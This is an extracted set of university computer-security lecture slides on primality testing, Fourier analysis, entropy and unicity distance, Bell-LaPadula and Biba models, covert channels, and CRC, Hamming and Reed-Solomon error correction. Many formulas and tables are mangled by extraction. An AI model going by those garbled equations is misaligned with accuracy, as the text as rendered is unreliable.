Simple Pseudo-prime Test: If a very large randominteger p (100 decimal digits or more) is not divisibleby a small prime, and if 3p−1 mod p = 1, then the num-ber is prime except for a vanishingly small probability,which one can ignore.


Prime check - 1105,1729

One could just repeat the test for other integers besides3 as the base, but unfortunately there are non-primes(called Carmichael numbers) that satisfy Fermat’s the-orem for all values of a even though they are not prime.

Chances of a mistake less than 10−41, in practice usebetter tests

Law PRIME-2:Just one simple pseudo-prime test is enough to test that a

very large random integer is probably prime.


Summary of topics

We can do BIG arithmetic in these fields

We can do fast exponentiation and modulo arithmetic

We can check for primes


Chapter 4



Chocolate fish people

Andreas Schuth

Chong Jun Yong

Ashley Ng *

Wu Yongzheng *

Zhang Huaixing *

Terence Sangeet



x ∗ a + y ∗ p = gcd(x, y)

Now - if p is a prime, then gcd(x, y) = 1, and so

x ∗ a + y ∗ p = 1

WRONG!



x ∗ a + y ∗ p = gcd(a, p)

Now - if p is a prime, then gcd(a, p) = 1, and so

x ∗ a + y ∗ p = 1

RIGHT!


Last session




This session

• Physical preliminaries

• Entropy


This session


• Entropy


Preliminaries - physical

Consider:

• Is the data analog or digital?

• What limits are placed on it?

• How is it to be transmitted?

• How can you be sure that it is correct/accurate?


Analog and digital

-1

0

1

2

3

4

5

-10 -8 -6 -4 -2 0 2 4 6 8 10

sin(x)+4(sin(x)>=0)+1

real(int(sin(x)*5))/10

The plot is amplitude versus time .


Analog and digital

Repetition rate (if it repeats) is called the frequency , andis measured in Hertz

The peak to peak signal level is called the amplitude.

The simplest analog signal is called the sine wave.

By mixing we may create any desired periodic waveform.


Analog and digital

-1

0

1

2

3

4

5

-10 -8 -6 -4 -2 0 2 4 6 8 10

sin(x)+4(sin(3*x)/3)+2

sin(x)+(sin(3*x)/3)

The plot is amplitude versus time . (Time domain)


Analog and digital

0.20.333

1.0

f 3f 5f

The plot is amplitude vs frequency . (Frequency domain).


Analog and digital

If we were to continue in the same progression, the resultantwaveform would be a square wave:

∞∑n=1

1n

sin(2πnf) (for odd n) ⇒ square wave, frequency f

This representation method is known as Fourier Analysisafter Jean-Baptiste Fourier.


Fourier analysis

4

π(sin(2πft) +

1

3sin(6πft) +

1

5sin(10πft) +

1

7sin(14πft) + ...)

3

4

5

6

7

8

9

10

11

-10 -8 -6 -4 -2 0 2 4 6 8 10

sin(x)+10sin(x)+(sin(3*x)/3)+8

sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+6sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+(sin(7*x)/7)+4


Fourier analysis

Transformation between equivalent time domain and fre-quency domain representations.

A piecewise continuously differentiable periodic func-tion in the time domain may be transformed to a dis-crete aperiodic function in the frequency domain.

smooth, repeating ↔ pointy, notrepeating

f(t) ↔ F (ω)


Fourier analysis

Time domain Frequency domain Description

Continuous, periodic À Discrete, aperiodic Fourier series

Continuous, aperiodic À Continuous, aperiodic Fourier transform

Discrete, periodic À Discrete, periodic Discrete Fourier series

Discrete, aperiodic À Continuous, periodic Discrete Fourier transform


Accuracy

Relationship between the bandwidth of a channel, and howaccurate a signal is.

Another way of stating this is to point out that the higherfrequency components are important - they are needed tore-create the original signal faithfully. If we had two 1,000Hzsignals, one a triangle, one a square wave - if they wereboth passed through the 1,000Hz bandwidth limited channelabove, they would look identical (a sine wave).


Example transforms

f(t)

t

F( )ω

ω


Example transforms

ω

ωF( )

f(t)

t


Example transforms

t

ω

F( )ω

f(t)


Convolution

The Fourier transform of the convolution f(t) ? g(t) isthe product of the Fourier transforms of the functionsF (ω) and G(ω), and vice versa.

f(t) ? g(t) ↔ F (ω)×G(ω)

f(t)× g(t) ↔ F (ω) ? G(ω

We can use convolution to easily predict the functions thatresult from complex signal filtering or sampling.


Convolution

g(t) G( )ω

F( ) * G( )f(t).g(t) ω

t ω

t ω

ω

f(t) F( )ω

ωt


Modulation

A baseband signal is one in which the data is directly con-verted to a signal and transmitted. When the signal is im-posed on another signal, the process is called modulation.

We may modulate for several reasons:

• The media may not support the baseband signal

• We may wish to use a single transmission medium totransport many signals


Modulation methods

• Frequency modulation - frequency shift keying (FSK)

• Amplitude modulation

• Phase modulation - phase shift keying (PSK)

• Combinations of the above (QAM)


Baseband digital encoding

The simplest encoding scheme is just to use a low level fora zero bit, and a high level for a one bit. As long as bothends of a channel are synchronized in some manner, wecan transfer data.

On the other hand, if the ends of the channel are not syn-chronized we might use a simple encoding scheme, such asBipolar or Manchester encoding, to transfer synchronizing(clock) information on the same channel.


Baseband digital encoding

Bipolar

BITS

TIME

CODE

CLOCK

RECVD

Manchester

BITS

TIME

CODE

CLOCK

RECVD

In Bipolar encoding, a 1 is transmitted with a positivepulse, a 0 with a negative pulse. Sometimes called re-turn to zero encoding.

In Manchester encoding, there is a transition in the cen-ter of each bit cell.


Summary

Data commonly transferred digitally

Trade-off between bandwidth, accuracy of any signal


Information theory

The term information is commonly understood. Considerthe following two sentences:

1. The sun will rise tomorrow.

2. The Fiji rugby team will win against the All Blacks (NewZealand rugby team) the next time they play.

Question: Which sentence contains the most information?


Information theory

Temperature today is OK, Temperature today is OK, Tem-perature today is OK, Temperature today is OK, Temper-ature today is OK, Temperature today is OK, Tempera-ture today is OK, Temperature today is OK, Temperaturetoday is OK, Temperature today is OK, ...

... total information here is close to zero!

?

More information means less predictable

Less information means more predictable


Information theory

Nyquist (1924) and Hartley (1928) laid the foundations:

Hartley showed that the information content is propor-tional to the logarithm of the number of possible mes-sages. Integers between 1 and n need log2 n bits.

Shannon developed a mathematical treatment of com-munication and information in an important paper at

http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html


http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html

Information theory model

ReceiverSourceInformation

TransmitterDestination

Channel

SourceNoise

(or sink)

The relevance of Shannon to secrecy is in another importantpaper at

http://www.cs.ucla.edu/˜jkong/research/security/shannon.html


http://www.cs.ucla.edu/~jkong/research/security/shannon.html

Entropy

In our communication model, the units of transmission arecalled messages, constructed from an alphabet of (say) nsymbols x ∈ x1, . . . , xn each with a probability of trans-mission Px.

We associate with each symbol x a quantity Hx which is ameasure of the information associated with that symbol.

Hx = Px log2

1Px


Entropy

Hx = Px log2

1Px

If the probability of occurence of each symbol is the same,we can derive Hartley’s result, that the average amount ofinformation transmitted in a single symbol (the source en-tropy) is

H(X) = log2 n

where X is a label referring to each of the source symbolsx1, . . . , xn.


Entropy units

Our units for entropy can be bits/second or bits/symbol , andwe also sometimes use unit-less relative entropy measures(relative to the entropy of the system if all symbols wereequally likely).


Entropy - same probability

Symbols Entropy of each symbol Bits needed2 Hx = 1

2log22 = 12 2 ∗ 1

2 = 14 Hx = 1

4log24 = 12 4 ∗ 1

2 = 28 Hx = 1

8log28 = 38 8 ∗ 3

8 = 316 Hx = 1

16log216 = 416 16 ∗ 4

16 = 421 Hx = 1

21log221 = 4.3921 21 ∗ 4.39

21 = 4.39


Entropy - different probability

However, if the probability of occurence of each symbol isnot the same, we derive the following result, that the sourceentropy is

H(X) =n∑

i=1

Pxilog2

1Pxi

Shannon’s paper shows that H determines the channel ca-pacity required to transmit the desired information with themost efficient coding scheme.



If we had a source emitting two symbols, 0 and 1, with prob-abilities of 1 and 0, then the entropy of the source is

H(X) =n∑

i=1

Pxilog2

1Pxi

= log2 1 + 0 ∗ log2 0

= 0 bits/symbol



If we were transmitting a sequence of letters A,B,C,D,E andF with probabilities 1

2,14, 116, 1

16, 116 and 1

16, the entropy for thesystem is

H(X) =12

log2 2 +14

log2 4 +416

log2 16

= 0.5 + 0.5 + 1.0

= 2 bits/symbol


Encoding the letters

A fixed size 3-bit code, and then a more complex code:

Symbol 3-bit code Complex code

A 000 0

B 001 10

C 010 1100

D 011 1101

E 100 1110

F 101 1111


Analysis of encoding

The average length of the binary digits needed to encode atypical sequence of symbols using the 3-bit code is

L(X) =

nXi=1

Pxi • sizeof(xi)

=1

2∗ 3 +

1

4∗ 3 +

4

16∗ 3

= 1.5 + 0.75 + 0.75

= 3 bits/symbol


Analysis of encoding

The average length of the binary digits needed to encode atypical sequence of symbols using the complex encoding is

L(X) =

nXi=1

Pxi • sizeof(xi)

=1

2∗ 1 +

1

4∗ 2 +

4

16∗ 4

= 0.5 + 0.5 + 1.0

= 2 bits/symbol

i.e. it is more efficient, averaging only 2 bits for each symboltransmitted.


Entropy and transmission rate

If our source was transmitting 0 and 1 bits with equal proba-bility, but the received data was corrupted 50% of the time,we might reason that our rate r(X) of information transmis-sion was 0.5, because half of our data is getting throughcorrectly.



Channel

SourceNoise

(or sink)



However, a better argument is to consider the difference be-tween the entropy of the source and the conditional entropyof the received data:

r(X) = H(X)−H(X | y)

where H(X | y) is the conditional entropy of the receiveddata.



H(X | y) = 0.5 ∗ log2 2 + 0.5 ∗ log2 2

= 1

and H(X) = 1 (shown before)

so r(X) = H(X)−H(X | y)

= 0 bits/symbol

This is a much better measure of the amount of informationtransmitted.


Redundancy

The ratio of the entropy of a source H(X) to what it wouldbe if the symbols had equal probabilities H ′(X), is calledthe relative entropy. We use the notation Hr(X), and

Hr(X) =H(X)

H ′(X)

The redundancy of the source is 1−Hr(X)

R(X) = 1−Hr(X)


Redundancy

If we look at English text a symbol at a time1, the redun-dancy is about 0.7.

This indicates that it should be simple to compress En-glish text by about 70%.

This sort of redundancy is a unitless relative redundancy

1That is, without considering letter sequences.


Unicity distance

Defined by Shannon - an approximation to the amount ofciphertext such that the the sum of the source entropy andthe encryption key entropy is the same as the number ofciphertext bits used.

Ciphertexts longer have only one meaningful decryption

Ciphertexts shorter may have more than one meaningfuldecryption (and hence be stronger, as a hacker will notknow which one is correct)


Unicity distance

The longer the unicity distance, the better the cryptosys-tem

Unicity distance U is the entropy of the key divided bythe redundancy of the source, and is approximately

U ≈ log2K

R log2P

(K is the key size, R is the redundancy, P is the number ofsymbols).


Unicity distance

26 letter alphabet, and 26! keys

U ≈ log226!0.5 log226

≈ 880.7 ∗ 4.7

≈ 27

So given a ciphertext of 27 symbols, a unique decoding ispossible.


Unicity distance

In general

Longer key length then longer unicity distance

Redundancy inversely proportional to unicity distance

Estimates the minimum amount of ciphertext for whichthere is only a single plaintext solution on doing a bruteforce attack...


Chapter 5



Last session


• Entropy


This session

• Channel properties

• Entropy

• Models


Hugh’s bigger mistakes...


Incorrect

0.20.333

1.0

f 3f 5f

The plot is frequency vs time . (Frequency domain).


Correct

0.20.333

1.0

f 3f 5f

The plot is amplitude vs frequency . (Frequency domain).


Incorrect


H(X) =n∑

i=1

Pxilog2

1Pxi

= log2 1 + 0 ∗ log2 0

= 0 bits/symbol


Correct


H(X) =

nXi=1

Pxi log21

Pxi

= 1 ∗ log2 1 + 0 ∗ log21

0

= 0 bits/symbol

Note thatlimy→0

y log21

y= 0


of notes

The first two equations that begin H(X) should begin withL(X).

L(X) =

nXi=1

Pxi • sizeof(xi)

=1

2∗ 3 +

1

4∗ 3 +

4

16∗ 3

= 1.5 + 0.75 + 0.75

= 3 bits/symbol


1/2 of data through correctly...

Received data is corrupted 50% of the time:

Before After


Convolution

Applet to do convolution:http://www.cs.brown.edu/exploratories/freeSoftware/repository/edu/brown/cs/exploratories/

applets/convolution/convolution java browser.html


http://www.cs.brown.edu/exploratories/freeSoftware/repository/edu/brown/cs/exploratories/applets/convolution/convolution_java_browser.html

This session


• Entropy

• Security models


Shannon and Nyquist



Channel

SourceNoise

(or sink)

Maximum BPS = W log2(1 + SN ) bits/sec


Shannon and Nyquist example

If we had a telephone system with a bandwidth of 3,000 Hz,and a S/N of 30db (about 1024:1)

D = 3000 ∗ log2 1025

≈ 3000 ∗ 10

≈ 30000 bps

This is a typical maximum bit rate achievable over the tele-phone network.


Nyquist

The maximum data rate over a limited bandwidth (W) chan-nel with V discrete levels is:

Maximum data rate = 2W log2 V bits/sec

For example, two-Level data cannot be transmitted overthe telephone network faster than 6,000 BPS, because thebandwidth of the telephone channel is only about 3,000Hz.


Nyquist example

If we had a telephone system with a bandwidth of 3,000 Hz,and using 256 levels

D = 2 ∗ 3000 ∗ log2 256

= 6000 ∗ 8

= 48000 bps

In these equations, the assumption is that the relative en-tropies of the signal and noise are a maximum (that they arerandom).


This session


• Entropy

• Security models


Maximum entropy

In practical systems, signals rarely have maximum entropy,and we can do better - there may be methods to compressthe data2.

2Note: we must also differentiate between lossy and lossless compressionschemes. A signal with an entropy of 0.5 may not be compressed more than 2:1 un-less you use a lossy compression scheme. JPEG and Wavelet compression schemescan achieve huge data size reductions without visible impairment of images, but therestored images are not the same as the original ones - they just look the same. Thelossless compression schemes used in PkZip, gzip or GIF files (LZW) cannot achievecompression ratios as high as that found in JPEG.


Huffman encoding

An immediate question of interest is “What is the minimumlength bit string that may be used to compress a string ofsymbols?”.

The Huffman encoding minimizes the bit length given thefrequency of occurence of each symbol3. The resultant bitstring in the best case will be the length predicted from thecalculation of the source entropy.

3Note that it presupposes knowledge about these frequencies.


Huffman encoding

How can we get knowledge about the frequency of (say)the letters in the English language?

(answer) - we read snapple bottle tops...


Huffman encoding

1

1

1

1

0 1

0

A O N S

T

0

0 0E

Less common characters use longer bit strings.


Huffman encoding

Our algorithm for encoding is simple - we calculate the treeencoding knowing the frequency of each letter:

Symbol Coding

E 00

T 10

A 010

O 011

N 110

S 111

To decode, traverse the tree taking a left or right path ac-cording to the bit. The leaf has our symbol.


Case study - MNP5 and V.42bis

MNP5 and V42.bis are compression schemes commonlyused on modems.

MNP5 suffers from the unfortunate property that it will ex-pand data with maximum or near-maximum entropy (in-stead of compression).

V42.bis does not have this property - it uses a large dictio-nary, and will not try to compress an already compressedstream.


MNP5

MNP5 uses two different compression methods, switchingbetween them as appropriate. The methods are:

• Adaptive frequency encoding

• Run-length encoding

Run length encoding sends the bytes with a byte countvalue, and doubles the size of a data stream with maximumentropy.


Adaptive frequency encoding

3-bit header Body size Total code size Number of codewords

000 1 bit 4 bits 2

001 1 bit 4 bits 2

010 2 bits 5 bits 4

011 3 bits 6 bits 8

100 4 bits 7 bits 16



111 7 bits 10 bits 128

34 of our codewords are larger than they would be if we didnot use this encoding scheme


Further study

• Textbook Chapter 32

• Shannon’s paper on secrecy systems athttp://www.cs.ucla.edu/˜jkong/research/security/shannon.html.


http://www.cs.ucla.edu/~jkong/research/security/shannon.html

This session


• Entropy

• Security models


Preliminaries - security models

Definition: a range of formal policies for specifying the se-curity of a system in terms of a (mathematical) model.

access control matrix

Bell-LaPadula

Biba

Clark-Wilson


Security model

Have a model

Determine properties

Verify implementations


Access control matrix

Rows of the matrix are subjects, columns are objects:

Objects

Subjects

f1 f2 f3 f4

s1 read

execute

execute

s2 write read execute

s3 read write execute

s4 read write read

s4 cannot read f1. But subjects may collude...


Bell-LaPadula, confidentiality

Military style to assure confidentiality services.

Security levels in a (total) ordering formalizing a policywhich restricts information flow from a higher securitylevel to a lower security level.

Lower-level subjects from accessing higher-level objects.

Section 5.2 in textbook


Bell-LaPadula, levels

1. Top secret (T )

2. Secret (S)

3. Confidential (C)

4. Unclassified (U )

where T > S > C > U . Access operations visualized usingan access control matrix, and are drawn from read , write .


BLP security property

The clearance classification for a subject s ∈ S or objecto ∈ O is denoted L(s) = ls or L(o) = lo. We might thenassume we can use this to construct a first simple securityproperty:

• No read-up-1 : s can read o if and only if lo ≤ ls, and shas read access in the access control matrix.

This single property is insufficient to ensure the restrictionwe need for the security policy.


BLP Trojan Horse property

Consider the case when a low security subject creates ahigh security object (say a program) which then reads a highsecurity file, copying it to a low security one. This behaviouris commonly called a Trojan Horse. A second property isneeded:

• No write-down-1 : s can write o if and only if ls ≤ lo, ands has write access in the access control matrix.

These two properties can be used to enforce our securitypolicy, but with a severe restriction. For example, how doesany subject write down without invalidating a security pol-icy?


BLP extended

A security category c ∈ C is used to classify objects in themodel, with any object belonging to a set of categories.Each pair (l × c) is termed a security level, and forms alattice.

Lattice - chapter 30 in textbook


BLP extended

We define a relation between security levels:

• The security level (l, c) dominates (l′, c′) (written(l, c) dom (l′, c′)) iff l′ ≤ l, and c′ ⊆ c.

A subject s and object o then belong to one of these securitylevels.


BLP extended

The new properties are:

• No read-up-2: s can read o if and only if s dom o, and shas read access in the access control matrix.

• No write-down-2: s can write o if and only if o dom s,and s has write access in the access control matrix.


BLP security

A system is considered secure in the current state if allthe current accesses are permitted by the two properties.

A transition from one state to the next is considered se-cure if it goes from one secure state to another securestate.

The basic security theorem stated in Theorem 5-2 in thetextbook states that if the initial state of a system is se-cure, and if all state transitions are secure, then the sys-tem will always be secure.


BLP example

From textbook, p128:

DG UNIX uses access controls and BLP-like behaviour


BLP limits

BLP is a static model, not providing techniques for changingaccess rights or security levels4, and there is an explorationand discussion into the limitations of this sort of securitymodelling in section 5.4 of the textbook.

However the model does demonstrate initial ideas into howto model, and how to build security systems that are prov-ably secure.

4You might want to explore the Harrison-Ruzo-Ullman model for this capability.


Biba model, integrity

Trustworthiness of data and programs - assurance forintegrity services.

Levels like clean or dirty (in reference to database en-tries).

Biba model (chapter 6.2) is a kind of dual for Bell-LaPadula. integrity vs confidentiality.


Biba levels

The integrity levels I are ordered as for the security lev-els

Function i : O → I (i : S → I) which returns the integritylevel of an object (subject).


Biba properties

The properties/rules for the main (static) Biba model are:

• No read-down : s can read o iff i(s) ≤ i(o).

• No write-up : s can write o iff i(o) ≤ i(s).

• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).


Biba - dynamic

Biba models can also handle dynamic integrity levels, wherethe level of a subject reduces if it accesses an object ata lower level (in other words it has got dirty). The low-watermark policies are:

• No write-up : s can write o iff i(o) ≤ i(s).

• Subject lowers : if s reads o then i′(s) = min(i(s), i(o)).

• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).


Biba - ring

Finally, we have a ring policy,

• All read : s can read o regardless.

• No write-up : s can write o if and only if i(o) ≤ i(s).

• No invoke-up : s1 can execute s2 if and only if i(s2) ≤i(s1).

Each of these policies have an application in some area. -Example in textbook, p155 (LOCUS OS)


Clark-Wilson, integrity

Transactions defined through certification rules.

The Clark-Wilson model has the following terminology:

Term Definition

CDI Constrained Data Item (data subject to control)

UDI UnconstrainedData Item (data not subject to control)

IVP Integrity Verification Procedures (for testing correct CDIs)

TP Transformation Procedures (for transforming the system)


Chapter 6

Lecture 6 - Errors


Assignment 1

Form your groups,

Select your project,

Email me with your proposal for approval


Assignment 1

Literature review - not a survey :(

Formal paper - format in either word.zip, latex2e.zip inhttp://www.comp.nus.edu.sg/˜cs3235/2003-semesterI/

Heading, Author(s), abstract (?), Introduction, body ofpaper, Summary/Conclusion, References

10-50 pages, 5-50 references



Assignment 2

More detailed, in-depth study

Not necessarily a software development project

Comparison, research, idea, program


Mid semester Test

9th October 2003

LT27, 14:30

MCQ, closed book

Covers everything up to the lecture before...


Last session


• Entropy

• Models


This session

• Information flow

• Simple error detection

• Simple error correction

• Encryption


Information flow (Chapter 16)

We may also more abstractly model some security poli-cies by considering the flow of information in a system.

We can use entropy to formalize this.

In this context, we can establish quantitative resultsabout information flow in a system, rather than just mak-ing absolute assertions5.

5For example, “System X reveals no more than 25% of the input values”.


Information flow

In the textbook we have a definition of information flowbased on the conditional entropy H(x | y) of some x giveny:

Definition 16-1. The command sequence c causes a flowof information from x to y′ if H(x | y′) < H(x | y). If ydoes not exist in s then H(x | y) = H(x).

We can use this to detect implicit flows of information, notjust explicit ones in which we directly modify an object.


Information flow

Consider the example on page 409 of the textbook:

if x=1 theny := 0

elsey := 1;

After this code segment, we can determine if x = 1 fromy′ even though we do not ever assign y′ directly from somefunction of x. In other words we have an implicit flow ofinformation from x to y′.


Information flow

Formal treatment by considering the entropy of x. If thelikelihood of x = 1 is 0.5, then H(x) = 1. We can alsodeduce that H(x | y′) = 0, and so

H(x | y′) < H(x | y) = H(x) = 1

and information is flowing from x to y′. Paper gives somebackground.


Confinement and covert channels

The confinement problem is one of preventing a systemfrom leaking (possibly partial) information.

Sometimes a system can have an unexpected path of trans-mission of data, termed a covert channel, and through theuse of this covert channel information may be leaked eitherby a malicious program, or by accident.



Consider the set of permissions on a file.

An unscrupulous program could modify these permissionscyclically to transmit a very-low data-rate message to an-other unscrupulous program.



We categorize covert channels into two:

1. Storage channels: using the presence or absence ofobjects

2. Timing channels: the speed of events

We can attempt to identify covert channels by building ashared resource matrix, determining which processes canread and write which resources.


Attacks on databases

Governing body may keep secret individual information,but release cumulative information

For example: Today’s average temperature of SOC staffby nationality:

Singaporean Malaysian PRC Poland German Australian New Zealand ....

36.8 36.7 36.9 37.1 36.5 38.2 38.1 ....


Attacks on databases

OK - doesn’t release any sensitive information, but

what if another part of the database released the num-bers of SOC staff by nationality...

Singaporean Malaysian PRC Poland German Australian New Zealand ....

23 12 14 3 5 4 1 ....

By inference you can deduce that the temperature of aparticular individual is too high!


This session




• Encryption


Simple check codes

Transmit data:

1 65 3 22 47 2

Transmit data+checksum:

1 65 3 22 47 2 140


One-way parity

A 0 1 0 0 0 0 0 10 0 0 1 1 0 0 0 0D 0 1 0 0 0 1 0 0B 0 1 0 0 0 0 1 0B 0 1 0 0 0 0 1 0C 0 1 0 0 0 0 1 1

Check: 0 1 1 1 0 1 1 0


Two way parity

A 0 1 0 0 0 0 0 1 00 0 0 1 1 0 0 0 0 0D 0 1 0 0 0 1 0 0 0B 0 1 0 0 0 0 1 0 0B 0 1 0 0 0 0 1 0 0C 0 1 0 0 0 0 1 1 1

Check: 0 1 1 1 0 1 1 0 X


Simple check codes

Parity of bits - detects all 1 bit errors, but...

Horizontal and vertical parity - better, but problems withrepetitive errors

Sum of values - problems with repetitive errors

Want better level of error checking


Cyclic redundancy check codes

Treat the stream of transmitted bits as a representation of apolynomial with coefficients of 1:

10110 = x4 + x2 + x1 = F (x)

Checksum bits are added to ensure that the final compositestream of bits is divisible by some other polynomial g(x).



We can transform any stream F (x) into a stream T (x)which is divisible by g(x).

If there are errors in T (x), they take the form of a dif-ference bit string E(x) and the final received bits areT (x) + E(x).

When the receiver gets a correct stream, it divides it byg(x) and gets no remainder.



The question is: How likely is that T (x) + E(x) will alsodivide with no remainder?

Single bits? - No a single bit error means that E(x)will have only one term (x1285 say). If the generatorpolynomial has xn + ... + 1 it will never divide evenly.

Multiple bits? - Various generator polynomials areused with different properties. Must have one factor ofthe polynomial being x1 + 1, because this ensures allodd numbers of bit errors (1,3,5,7...).


Some common generators:

• CRC-12 - x12 + x11 + x3 + x2 + x1 + 1

• CRC-16 - x16 + x15 + x2 + 1

• CRC-32 - x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+1

• CRC-CCITT - x16 + x12 + x5 + 1


Long division is easy!

Generator g(x): x5 + x2 + 1 (100101) and F (x): 101101011.

divide F (x) by g(x), and the remainder is appended to F (x)to give T (x):

1010.01000100101 )101101011.00000

100101100001100101

1001.001001.01

1000

T (x) = 10110101101000.



When this stream is received, it is divided but now will haveno remainder if the stream is received without errors.

QD

C

S/RQD

C

S/R QD

C

S/RQD

C

S/RQD

C

S/R

Data

Clock

XORXOR

D1D0 D2 D3 D4



Input data D4 D3 D2 D1 D0 Note

... 0 0 0 0 0 Initial state

1 0 0 0 0 1 First bit

0 0 0 0 1 0 Second bit

1 0 0 1 0 1 Third bit

1 0 1 0 1 1

0 1 0 1 1 0

1 0 1 0 0 0

0 1 0 0 0 0

1 0 0 1 0 0

...



Input data D4 D3 D2 D1 D0 Note

...

1 0 1 0 0 1

0 1 0 0 1 0

0 0 0 0 0 1

0 0 0 0 1 0

0 0 0 1 0 0

0 0 1 0 0 0


Case study: ethernet

Ethernet is used for networking computers, principally be-cause of its speed and low cost. The maximum size of anethernet frame is 1514 bytes6, and a 32-bit FCS is calcu-lated over the full length of the frame.

The FCS used is:

• CRC-32 - x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+1

61500 bytes of data, a source and destination address each of six bytes, and a twobyte type identifier. The frame also has a synchronizing header and trailer which is notchecked by a CRC.


This session




• Encryption


Simple error correction

Methods used to correct errors:

• Ignore errors, while acknowledging correct data. ARQ(for Automatic Repeat reQuest).

• Error correcting codes (for computer memory)


Code types

We can divide error correcting codes (ECC) into continu-ous and block-based types. Convolutional encodings areused for continuous systems, and the common block-basedcodes are:

• Hamming codes (for correcting single bit errors),

• Golay codes (for correcting up to three bit errors), and

• Bose-Chaudhuri-Hocquenghem (BCH ) codes (for cor-recting block errors).


Combining error correcting codes

Different types of error correcting codes can be com-bined to produce composite codes.

For example, Reed-Solomon block-codes are often com-bined with convolutional codes to improve all-round per-formance.

In this combined setup, the convolutional code correctsrandomly distributed bit errors but not bursts of errorswhile the Reed-Solomon code corrects the burst errors.


Accepting bad data

Sometimes we are willing to accept bad data...


BER and noise

System Error rate (errors/bit)

Wiring of internal circuits 10−15

Memory chips 10−14

Hard disk 10−9

Optical drives 10−8

Coaxial cable 10−6

Optical disk (CD) 10−5

Telephone System 10−4


BER and noise

We can determine the theoretical channel capacity knowingthe SNR:

• BER is 0.01, channel capacity C ' 0.92 bits/symbol.

• BER is 0.001, channel capacity C ' 0.99 bits/symbol.

• BER is 0, channel capacity C = 1 bits/symbol.

The theoretical maximum channel capacity is quite close tothe perfect channel capacity, even if the BER is high.


Reducing BER

Increase the signal (power), or

Reduce the noise (often not possible), or

Use ECC.

The benefit of error correcting codes is that they can im-prove the received BER without increasing the transmittedpower. This performance improvement is measured as asystem gain .


Reducing BER

Example: Consider a system without ECC giving a BER of0.001 with a S/N ratio of 30dB (1000:1). If we were to usean ECC codec, we might get the same BER of 0.001 witha S/N ratio of 20dB (100:1). We say that the system gaindue to ECC is 10dB (10:1).


Bad ECC scheme: repetition

An initial scheme to correct transmission errors might be tojust repeat bits7.

Data: 0 1 0 0 1 1 1 1 ...Transmit: 000111000000111111111111...

If we send three identical bits for every bit we wish to trans-mit, we can then use a voting system to determine the mostlikely bit. If our natural BER due to noise was 0.01, with threebits we would achieve a synthetic BER of 0.0001, but ourchannel capacity is reduced to about C = 0.31 bits/symbol.

7Note: there is no point in repeating bits twice. you must repeat three times, or 5times, and then vote to decide the best value.


Bad ECC scheme: repetition

We can see from this that the rate of transmission us-ing repetition has to approach zero to achieve more andmore reliable transmission.

However we know that the theoretical rate should beequal to or just below the channel capacity C.

Convolutional and other encodings can achieve rates oftransmission close to the theoretical maximum.


ECC scheme: Hamming

Hamming codes are block-based error correcting codes.

We add hamming bits to a string

Here we derive the inequality used to determine howmany extra hamming bits are needed for an arbitrary bitstring.


ECC scheme: Hamming

The hamming distance is a measure of how FAR apart twobit strings are.

A: 0 1 0 1 1 1 0 0 0 1 1 1B: 0 1 1 1 1 1 1 0 0 1 0 1A XOR B: 0 0 1 0 0 0 1 0 0 0 1 0


ECC scheme: Hamming

If we had two bit strings X and Y representing two char-acters, and the hamming distance between any two codeswas d, we could turn X into Y with d single bit errors.

• If we had an encoding scheme (for say ASCII characters)and the minimum hamming distance between any twocodes was d + 1, we could detect d single bit errors8.

• We can correct up to d single bit errors in an encodingscheme if the minimum hamming distance is 2d + 1.

8Because the code d bits away from a correct code is not in the encoding.


ECC scheme: Hamming

If we now encode m bits using r extra hamming bits to makea total of n = m + r , we can count how many correct andincorrect hamming encodings we should have. With m bitswe have 2m unique messages - each with n illegal encod-ings, and:

(n + 1)2m ≤ 2n

(m + r + 1)2m ≤ 2n

m + r + 1 ≤ 2n−m

m + r + 1 ≤ 2r


ECC scheme: Hamming

We solve this inequality, and then choose R, the next integerlarger than r.

Example: If we wanted to encode 8 bit values (m = 8) andbe able to recognise single bit errors:

8 + r + 1 ≤ 2r

9 ≤ 2r − r

r ' 3.5

R = 4


Reed-Solomon codes

Reed-Solomon codes are block-based error correctingcodes which are particularly good at correcting bursts(sequences) of bit errors.

They are found in a wide range of digital communicationsand storage applications.

Reed-Solomon codes are used to correct errors in digitalwireless applications such as wireless LAN systems, andlow Earth orbit (LEO) satellite communication systems.


Reed-Solomon codes

A Reed-Solomon code is specified as

• RS(n,k) with s-bit symbols.

This means that the encoder takes k data symbols of s bitseach and adds parity symbols to make an n symbol Thereare n− k parity symbols of s bits each.A Reed-Solomon decoder can correct up to t symbols thatcontain errors in a codeword, where

2t = n− k


Reed-Solomon code

Example: A popular Reed-Solomon code is RS(255,223)with 8-bit symbols. Each codeword contains 255 code wordbytes, of which 223 bytes are data and 32 bytes are parity.In this example, n = 255, k = 223, and s = 8.

2t = 32

and so t = 16

The Reed-Solomon decoder in this example can correct any16 symbol errors in the codeword.


Chapter 7

Lecture 7 - Encryption


Mid semester Test

9th October 2003

LT27, 14:30

MCQ, closed book

Covers everything up to the lecture before...


Last session





This session

• Finish on error correction

• Encryption

– Symmetric keys∗ DES

– Public keys∗ RSA


Key points from last week

Error detection vs Error correction

Mathematical analysis

Error rate, noise, channel capacity

Theoretical vs actual channel capacity


This session


• Encryption




Convolutional codes

Convolutional codes operate continuously and so are es-pecially useful in data transmission systems.

The convolutional encoder operates on a continuousstream of data using a shift-register to produce a con-tinuous encoded output stream.


Convolutional codes

QD

C

S/RData In

Data OutS/R

C

D QDQS/R

C

Received bit sequence can be examined for the most likelycorrect output sequence


Trellis diagram

000000

00

00

11 11111111

00

B

A

D

00000000

C

11

1010

01 01

101001 010101

01

10

11

11 11 11

10

01 01

101010


Most likely path

If we were to input the sequence 011010, we would get thefollowing trace through the trellis, with the bit sequence out-put as 001110110101:

D

B

A

C

10 0101111100


Convolutional codes

Determine the most likely path, even with large numbersof bit errors.

A convolutional encoding can often reduce errors by afactor of 102 to 103.


Viterbi decoding

The Viterbi algorithm tries to find the most likely re-ceived data sequence, by keeping track of the four mostlikely paths through the trellis.

For each path, a running count of the hamming distancebetween the received sequence and the path is main-tained.

The most likely received string is the one with the lowesthamming distance.


This session


• Encryption




Encryption and authentication

Security and Cryptographic systems act to reduce failure ofsystems due to the following threats:

